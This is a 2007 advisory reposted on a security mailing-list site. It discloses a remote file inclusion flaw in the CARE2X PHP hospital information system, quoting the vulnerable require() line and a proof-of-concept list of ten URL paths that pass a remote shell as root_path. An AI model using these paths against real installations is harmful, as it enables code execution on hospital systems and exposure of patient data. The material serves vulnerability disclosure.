Computer Security
[EN] securityvulns.ru
no-pyccku

  

Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [Aria-Security Team] social-networkin SQL Injection

  NuclearBB Alpha 2 Remote File Inclusion

  Husrev Forums v2.0.1:PoWerBoard Sql

  Proxy Anket v3.0.1 Sql injection Vulnerable

From:Ivan Niiiil <insp0w3r_(at)_gmail.com>
Date:11.09.2007
Subject:CARE2X php Integ Hospital Info System 2G Deployment 2.2 Multi Remote File Include

#######################################
X---- w w w . u N k n 0 w n . e u ----X
#######################################

CARE2X php Integ Hospital Info System 2G Deployment 2.2 Multi Remote File
Include

::Home:
 http://care2x.org/
 http://sourceforge.net/projects/care2002/

::Vuln Type :
 Remote File Include (RFI)

::Discovered by :
 iNs


::Vuln Code:
/language/en/en_copyrite.php

<?php
require($root_path.'include/inc_credits_openwin.php');


PoC:
/language/en/en_copyrite.php?root_path=shell??
/language/vi/vi_copyrite.php?root_path=shell??
/language/ar/ar_copyrite.php?root_path=shell??
/include/care_api_classes/class_access.php?root_path=shell??
/include/care_api_classes/class_department.php?root_path=shell??
/include/care_api_classes/class_config.php?root_path=shell??
/include/care_api_classes/class_image.php?root_path=shell??
/include/care_api_classes/class_ward.php?root_path=shell??
/include/care_api_classes/class_product.php?root_path=shell??
/gui/smarty_template/smarty_care.class.php?root_path=shell??

And maybe others...


:: iNs @ uNkn0wn.eu ::

::Gr33tz t0:
uNkn0wn.eu - iD - Stel128 - Spitfire - fEaRz - R1der - Stranger21 - nexos -
sh4m4n - Svarshik
DRT Memb3rz - s[H]4g - deL - l10m - l1l - r00tm1nd - f|_|ck3r - p1mmy
ActiveSpy - r100z - The_PitBull - MaxDeMon - SancheZ - r0x00k - str0ke

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru